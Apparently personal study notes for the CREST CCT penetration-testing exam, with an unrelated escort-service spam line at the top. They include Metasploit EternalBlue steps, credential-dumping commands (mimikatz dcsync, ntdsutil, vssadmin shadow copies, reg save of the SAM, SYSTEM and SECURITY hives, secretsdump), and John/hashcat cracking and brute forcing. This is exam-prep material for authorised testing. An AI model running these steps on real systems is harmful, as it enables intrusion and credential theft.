Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
CREST CCT Lab Prep Notes
1. Long Question Useful
Web Server Counter Measures – p158 2nd Edition
Appendix A: Soft Skills and Assessment Management
A5 Record Keeping, Interim Reporting & Final Results
Understanding reporting requirements. Understanding the importance of accurate and structured record keeping
during the engagement.
Appendix B: Core Technical Skills
B4 Network Mapping & Target Identification
Analysis of output from tools used to map the route between the engagement point and a number of targets.
Network sweeping techniques to prioritise a target list and the potential for false negatives.
B11 Cryptography
Differences between encryption and encoding. Symmetric / asymmetric encryption. Encryption algorithms: DES,
3DES, AES, RSA, RC4. Hashes: SHA1 and MD5 Message Integrity codes: HMAC
Appendix C: Background Information Gathering & Open Source
C3 Customer Web Site Analysis
Analysis of information from a target web site, both from displayed content and from within the HTML source.
2. Appendix E: Microsoft Windows Security Assessment
E4 Windows Passwords
Password policies (complexity, lockout policies) Account Brute Forcing Hash Storage (merits of LANMAN, NTLMv1 /
v2) Offline Password Analysis (rainbow tables / hash brute forcing)
E5 Windows Vulnerabilities
Knowledge of remote windows vulnerabilities, particularly those for which robust exploit code exists in the public
domain.
Video: MS17-010 – Eternal Blue
msfconsole
use auxiliary/scanner/smb/smb_ms17_010
show options
set RHOSTS 10.10.12.107
exploit
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.10.12.107
exploit
Metasploit.txt
Metasploit
Start up and Update
Example: Metasploit - Exploiting MS17-010 - Eternalblue Vulnerability
Exploits
search: IIS, RDP
use $exploit
show options | show payloads | show targets
set settings ...
exploit/run (for auxiliary)
Auxiliary Modules
show options, set RHOSTS (and other values such THREADS, VHOSTS), run
Eternal Blue SMB Remote Windows Kernel Pool Corruption-MS17-010
Knowledge of local windows privilege escalation vulnerabilities and techniques.
Knowledge of common post exploitation activities:
Obtain password hashes, both from the local SAM and cached credentials
HASHES
Hashes on stored in the SAM database on a Windows system, or the NTDS database on the Domain
Controller.
1. SAM file (need both C:windowssystem32configSAM, and
C:windowssystem32configsystem)
2. Registry (HKEY_LOCAL_MACHINESecurityCache for domain credentials, HKEY_LOCAL_MACHINESAM
for local credentials)
3. 3. Domain Controller: C:WindowsNTDSNTDS.dit
4. In-memory (dump with mimikatz) -- however this last one isn't "stored" as in written-to-disk.
LM-hashes is the oldest password storage used by Windows, dating back to OS/2 in the 1980’s and were
turned off by default starting in Windows Vista/Server 2008. it is possible to enable it in later versions
through a GPO setting (even Windows 2016/10).
NTHash is often referred to as NTLM hash. The v1 of the protocol uses both the NT and LM hash, depending
on configuration and what is available. NTLMv2 (different algorithm) s the default in Windows since
Windows 2000.
OBTAINING THE HASHES
Mimikatz has a feature (dcsync) which utilises the Directory Replication Service (DRS) to retrieve the
password hashes from the NTDS.DIT file. It can be executed from any system that is part of the domain from
the context of domain administrator.
lsadump::dcsync /domain:pentestlab.local /all /csv
The ntdsutil is a part of the domain controller ecosystem and its purpose is to enable administrators to
access and manage the windows Active Directory database.
ntdsutil
activate instance ntds
ifm
create full C:ntdsutil
quit
quit
Two new folders will be generated: Active Directory and Registry. The NTDS.DIT file will be saved in the
Active Directory and the SAM and SYSTEM files will be saved into the Registry folder.
DiskShadow is a Microsoft signed binary which is used to assist administrators with operations related to the
Volume Shadow Copy Service (VSS). DiskShadow is included in Windows Server 2008, Windows Server 2012,
and Windows Server 2016 and is a Windows signed binary.
4. VSSadmin – Comes with Windows servers. The volume shadow copy is a Windows command line utility
which enables administrators to take backups of computers, volumes and files even if they are in use by the
operating system.
vssadmin list shadows - check whether any shadow copies already exist
vssadmin create shadow /for=C: - create a shadow copy, then copy ntds.dit and SYSTEM
copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy1WindowsSystem32configSAM C:SAM1
copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy1WindowsSystem32configSYSTEM C:SYSTEM1
NTDS may not exist if you did not dump from a DC.
vssadmin delete shadows /shadow=[GUID] - delete the shadow copy (if you need to run this…)
Then extract using either SamDump2 or impacket.
Can also use Cain to dump the passwords.
Registry and SamDump2
C:WINDOWSsystem32>reg save hklmsam c:sam
The operation completed successfully.
C:WINDOWSsystem32>reg save hklmsystem c:system
The operation completed successfully.
C:WINDOWSsystem32>reg save hklmsecurity c:security
The operation completed successfully.
The security file contains the cached credentials.
Copy the files to Kali and run SamDump2 (or impacket which gives more info)
root@Kali:~# samdump2 system sam
*disabled*
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
PWdump - PWdump7 needs to be run as admin.
pwdump7 > hash.txt
Cached Credentials
Having dumped the security hive from registry:
C:WINDOWSsystem32>reg save hklmsecurity c:security
The operation completed successfully.
Then from Kali use impacket gives information of SAM and SYSTEM. The file name is sam and system. If you
don’t have security you can remove it.
root@Kali:~# python /usr/share/doc/python-impacket/examples/secretsdump.py -sam sam -
security security -system system LOCAL
5. Impacket v0.9.13 - Copyright 2002-2015 Core Security Technologies
[*] Target system bootKey: 0x4e52ab9bfb9019fb6827913377943620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::
:
[*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
[*] Dumping LSA Secrets
[*] DPAPI_SYSTEM
0000 01 00 00 00 D7 C6 B0 AD 57 36 7C D6 4C 22 3A 59 ........W6|.L":Y
0010 25 9E 19 C8 3F E0 8C E7 FD C5 53 6F B4 84 2E 83 %...?.....So....
0020 3B DB 63 C1 A5 EB FF 3A 05 89 C4 29 ;.c....:...)
[*] NL$KM
0000 5E FD D7 75 81 79 FE B5 B8 09 59 CA D9 68 76 32 ^..u.y....Y..hv2
0010 B4 96 A7 B3 A6 12 66 1D D9 AE C0 ED AE D2 0C B7 ......f.........
0020 6E E7 8E 89 D2 41 BF 92 58 E6 D4 C7 04 54 89 58 n....A..X....T.X
0030 01 EA D5 75 6C 8E EE E6 8C D6 F6 AA 02 12 7A 47 ...ul.........zG
[*] RasDialParams!S-1-5-21-2026301890-2774087781-1233172474-1001#0
0000 35 00 30 00 30 00 39 00 30 00 39 00 33 00 37 00 5.0.0.9.0.9.3.7.
0010 00 00 31 00 36 00 30 00 38 00 00 00 33 00 00 00 ..1.6.0.8...3...
0020 00 00 00 00 44 00 61 00 76 00 69 00 64 00 33 00 ....D.a.v.i.d.3.
0030 30 00 39 00 2D 00 56 00 50 00 4E 00 00 00 40 00 0.9.-.V.P.N...@.
0040 4A 00 61 00 70 00 61 00 6E 00 30 00 31 00 23 00 x.x.x.x.x.x.x.x.
0050 00 00 00 00 30 00 00 00 00 00 ....0.....
[*] Cleaning up...
Obtain locally-stored clear-text password
Crack password hashes
John the Ripper, Cain & Abel is a Windows-based tool with a host of useful features, including a password cracker.
It's normally a good idea to break very weak passwords with a simple dictionary attack and short (5 character) brute
force attack first, then let the Rainbow Tables pick up the rest.
SHA256 Hashing:
kali# echo pearson | sha256sum
901….ba13
Windows password storage does not use salt so hashed passwords would look the same. Unlike in Linux, because of
use of salting, if two users have same password then they will look different.
NT password hashes will be mixed case, whereas LMHash will be all uppercase.
John the Ripper
John comes with its own dictionary at /usr/share/john/password.lst You can edit the file to add your own
passwords, or use your own list using wordlist=/usr/share/john/file.lst.
In the output, the username will be on the right-hand side and cracked password on the left. The number next to the
username tells you which side of the password it is cracking for LMHASH which stores if password is greater than 8
characters it splits it into two and always make password upper case. So lowercase, password would be stored as
PASSWOR and D.
kali# john password-hashes.txt
ACME201 (fireman:2)
6. The below command will show all passwords that have been cracked:
kali# john –show password-hashes.txt
The hidden directory in home ./john stores the output files of .log, .pot, .rec
Change the format to NT cracking (default is LMHASH)
kali# john password-hashes.txt –-format=nt
…and then have to specify format in show command:
kali# john –show password-hashes.txt –format=nt
Hashcat
GPU (graphics card) support, so faster and works on Windows and is able to crack a large variety of hash formats.
hashcat64.exe –potfile-path cracked-passwords.txt -m 3000 password_hashes.txt -a 3
The potfile is where the cracked passwords will be stored, the -m 3000 specifies the hash format being cracked,
3000 is for LMhash and 1000 is for NT Hash, the -a specifies brute force.
To view the cracked passwords:
hashcat64.exe –m 3000 –potfile-path cracked_passwords.pot password_hashes.txt –show --username
Can use a dictionary attack:
hashcat64.exe –potfile-path cracked_passwords.pot -m 3000 password_hashes.txt
D:toolshatsrockyou.txt -r D;toolhashcat-3.6.0rulesInsidePro-PasswordsPro.rule
The rule specifies various mangling rules.
Check patch levels – CREST Exam Notes;
WMIC: wmic qfe list full /format:htable > hotfixes.htm
Powershell (enter powershell) Get-WmiObject -Class "win32_quickfixengineering"
get-hotfix
Linux: Debian or Ubuntu: apt-get upgrade -s | grep -i security
RH: rpm -qa --last
Derive list of missing security patches -
Reversion to previous state: System Restore is a Windows feature that can help fix certain types of crashes
and other computer problems.
7. Appendix G: Web Technologies
G2 Web Servers & their Flaws
Common web servers and their fundamental differences and vulnerabilities associated with them:
IIS – P372 Network Security Assessment
Apache (and variants) – P373 Network Security Assessment
G4 Web Protocols
Web protocols: HTTP, HTTPS, SOAP.
All HTTP web methods and response codes.
See Exam Notes - Identifying Permitted HTTP Methods, also Web App Notes for Nmap NSE and Metasploit
script (p16)
HTTP Header Fields relating to security features
See Web App and Exam Notes
G7 Web Application Servers
Vulnerabilities in common application frameworks, servers and technologies: .NET (p413), J2EE, ColdFusion (p403),
Ruby on Rails (p409) and AJAX.
Chapter 14, Network Security Assessment.
AJAX Security - CS.html DotNet Security - CS.html Ruby on Rails - CS.html
G8 Web APIs
Application interfaces: CGI, ISAPI filters and Apache modules.
G9 Web Sub-Components
Web architecture sub-components: Thin/Thick web clients, servlets and applets, Active X.
Flash Application Testing
.Net Thick Clients
Java Applets
Decompilation of client-side code
Base64 decoding? – Burp Decoder
8. Appendix H: Web Testing Methodologies
H3 Information Gathering from Web Mark-up
Examples of the type of information available in web page source that may prove useful to an attacker:
Hidden Form Fields – Burp: Proxy > Options > Response Modification: Unhide Hidden Form Fields.
Database Connection Strings
Credentials
Developer Comments
Other included files
Authenticated-only URLs
H4 Authentication Mechanisms
Common pitfalls associated with the design and implementation of application authentication mechanisms.
Useful p180, 2nd Edition
H5 Authorisation Mechanisms
Common pitfalls associated with the design and implementation of application authorisation mechanisms.
H6 Input Validation
The importance of input validation as part of a defensive coding strategy.
How input validation can be implemented and the differences between white listing, black listing and data
sanitisation.
H7 Application Fuzzing
Fuzzing and its relevance within web-app penetration testing.
The use of fuzz strings and their potential effects.
Potential dangers of fuzzing web applications.
H9 Use of Cross Site Scripting Attacks
Potential implications of a cross site scripting vulnerability.
Ways in which the technique can be used to benefit an attacker.
H10 Use of Injection Attacks
Potential implications of injection vulnerabilities:
SQL injection
LDAP injection
Code injection
XML injection
Ways in which these techniques can be used to benefit an attacker.
9. H11 Session Handling
Common pitfalls associated with the design and implementation of session handling mechanisms.
H12 Encryption
Common techniques used for encrypting data in transit and data at rest, either on the client or server side.
Identification and exploitation of Encoded values (e.g. Base64) and Identification and exploitation of Cryptographic
values (e.g. MD5 hashes)
Identification of common SSL vulnerabilities
H13 Source Code Review
Common techniques for identifying and reviewing deficiencies in the areas of security.
Useful table p164, 2nd Edition
10. Appendix I: Web Testing Techniques
I1 Web Site Structure Discovery
Spidering tools and their relevance in a web application test for discovering linked content.
Forced browsing techniques to discover default or unlinked content -
Web Application Security Methodology and Testing: Directory and File Scanning, also Nikto
Identification of functionality within client-side code
I2 Cross Site Scripting Attacks
Arbitrary JavaScript execution.
Using Cross Site Scripting techniques to obtain sensitive information from other users.
Phishing techniques.
See XSS
I3 SQL Injection
Determine the existence of an SQL injection condition in a web application.
Determine the existence of a blind SQL injection condition in a web application.
Exploit SQL injection to enumerate the database and its structure.
Exploit SQL injection to execute commands on the target server.
See SQL injection
I4 Session ID Attacks
Investigate session handling within a web application.
Harvest and analyse a number of session identifiers for weaknesses.
See Testing Session ID and Token Strength
Useful table p167 2nd
Edition
I5 Fuzzing
The concept of fuzzing within a web application testing methodology.
Common fuzzing tools.
I6 Parameter Manipulation
Parameter manipulation techniques, particularly the use of client-side proxies.
I7 Data Confidentiality & Integrity
Identifying weak (or missing) encryption.
Identifying insecure SSL configurations.
11. Identify insecure use of encoding techniques
I8 Directory Traversal
Identifying directory traversal vulnerabilities within applications.
See RFI and LFI, Path Transversal
I9 File Uploads
Identifying common vulnerabilities with file upload capabilities within applications.
See Uploads.
I10 Code Injection
Investigate and exploitation of code injection vulnerabilities within web applications
See OS command injection – get Commix working…
I11 CRLF Attacks
Assessment of web applications for CRLF vulnerabilities
See HTTP Testing – Headers
I12 Application Logic Flaws
Assessing the logic flow within an application and the potential for subverting the logic.
12. Appendix J: Databases
J1 Microsoft SQL Server (p424)
Knowledge of common attack vectors for Microsoft SQL Server. Understanding of privilege escalation and attack
techniques for a system compromised via database connections.
See CREST exam notes
J2 Oracle RDBMS (p426)
Derivation of version and patch information from hosts running Oracle software.
Default Oracle accounts.
See CREST exam notes
J3 Web / App / Database Connectivity
Common databases (MS SQL server, Oracle, MySQL and Access) and the connection and authentication methods
used by web applications
See CREST exam notes
Useful Nmap Scripts
MS SQL
ms-sql-brute.nse - Performs password guessing against Microsoft SQL Server. SQL Server 2005 and later versions
include support for account lockout policies.
MySQL
nmap -p 3306 –script=”mysql-info” 127.0.0.1 - Connects to a MySQL server and prints information such as
the protocol and version numbers, thread ID, status, capabilities, and the password salt.
nmap -sV -sC <target>
3306/tcp open mysql
| mysql-info:
| Protocol: 10
| Version: 5.0.51a-3ubuntu5.1
| Thread ID: 7
| Capabilities flags: 40968
| Some Capabilities: ConnectWithDatabase, SupportsTransactions, Support41Auth
| Status: Autocommit
|_ Salt: bYytNQ/4V6IN+*3`imj
mysql-enum – Performs valid-user enumeration. Server version 5.x are susceptible to an user enumeration attack
due to different messages during login when using old authentication mechanism from versions 4.x and earlier.
mysql-brute – Basic brute force, can be run without word list.
nmap --script=mysql-brute <target>
3306/tcp open mysql
| mysql-brute:
| Accounts
| root:root - Valid credentials
13. Additional
Identification of more recent SSL vulnerabilities – e.g. BEAST (page 318)
ssl-enum-ciphers - This script repeatedly initiates SSLv3/TLS connections, each time trying a new cipher or
compressor while recording whether a host accepts or rejects it. The end result is a list of all the cipher suites and
compressors that a server accepts.
nmap -sV --script ssl-enum-ciphers -p 443 <host>
POODLE - We can deduce if a server is vulnerable to poodle if it supports SSLv3 protocol and uses CBC
ciphers.
BEAST - Any server supporting SSLv3 OR TLS 1.0 and uses CBC ciphers.
BEAST was indeed an attack on CBC mode with predictable (in fact known) IV in SSL3 and TLS1.0, because those
protocols used the last block of the previous record, which (usually) has already been sent and seen by the
adversary, as the IV for the next record.
POODLE is not an attack on IV at all; it is a padding oracle attack on the padding used in SSL3 (and it turned out some
debatably defective TLS1.0 implementations also), hence the acronym Padding Oracle on Downgraded Legacy
Encryption
Examples.txt
HTTP Header Fields relating to security features – e.g. HSTS
See CREST Notes: HTTP Header Fields relating to security features
Useful p172, 2nd Edition
Strict-Transport-Security.html
Web Server security misconfigurations – e.g. WebDAV - Page 340, 372, and p116 2nd
Edition
http-webdav-scan - The script sends an OPTIONS request which lists the dav type, server type, date and allowed
methods. It then sends a PROPFIND request and tries to fetch exposed directories and internal ip addresses by doing
pattern matching in the response body.
nmap --script http-webdav-scan -p80,8080 <target>
Script Output
PORT STATE SERVICE
8008/tcp open http
| http-webdav-scan:
| Allowed Methods: GET, HEAD, COPY, MOVE, POST, PUT, PROPFIND, PROPPATCH, OPTIONS, MKCOL,
DELETE, TRACE, REPORT
| Server Type: DAV/0.9.8 Python/2.7.6
| Server Date: Fri, 22 May 2015 19:28:00 GMT
| WebDAV type: Unknown
| Directory Listing:
| http://localhost
| http://localhost:8008/WebDAVTest_b1tqTWeyRR
| http://localhost:8008/WebDAVTest_A0QWJb7hcK
| http://localhost:8008/WebDAVTest_hf9Mqqpi1M
|_ http://localhost:8008/WebDAVTest_Ds5KBFywDq
14. Metasploit has a few modules to test for WebDAV presence.
WebDAV.txt
Decompilation of client-side code – e.g. Flash, Java, .Net
Flash
Flash maintains its own cookie store that allows for cookies (that can’t be deleted directly from the browser).
ActionScript is an open source scripting language that compiles into bytecode and is leveraged both in Adobe
Flash and Apache Flex. The bytecode is executed within an ActionScript Virtual Machine (AVM), which
provides a similar sandbox environment to Java.
Though the ActionScript-compiled bytecode is not human-readable, tools such as SWFScan24 can turn the
bytecode back into ActionScript.
JPEXS Free Flash Decompiler
Perl Script – SWF-File-0.42
Java
Java code runs in two primary ways: either through standalone Java applications or through web applets.
Applets are Java code specifically designed to run within a web page.
Java has a security model around the applets that tries to prevent them from calling malicious code. This
model, also known as a sandbox.
A core difference between a signed applet and an unsigned applet (quarantined within the sandbox) is that a
signed applet can execute code outside of the sandbox.
Actions like accessing the file system or executing operating system commands are blocked by default. The
Java security model requires code to be trusted or permission to be given before accessing functionality that
has security implications.
Java code is compiled into byte code resulting in a compiled class file and then proceed by the JVM.
Reversing Java using JD-GUI – page 391
.Net
JustDecompile
Vulnerabilities in increasingly prevalent application frameworks – e.g. Rail (p409)
Flash Application Testing
Java Applets
.Net Thick Clients
Identification of functionality within client-side code that is accessible only to privileged users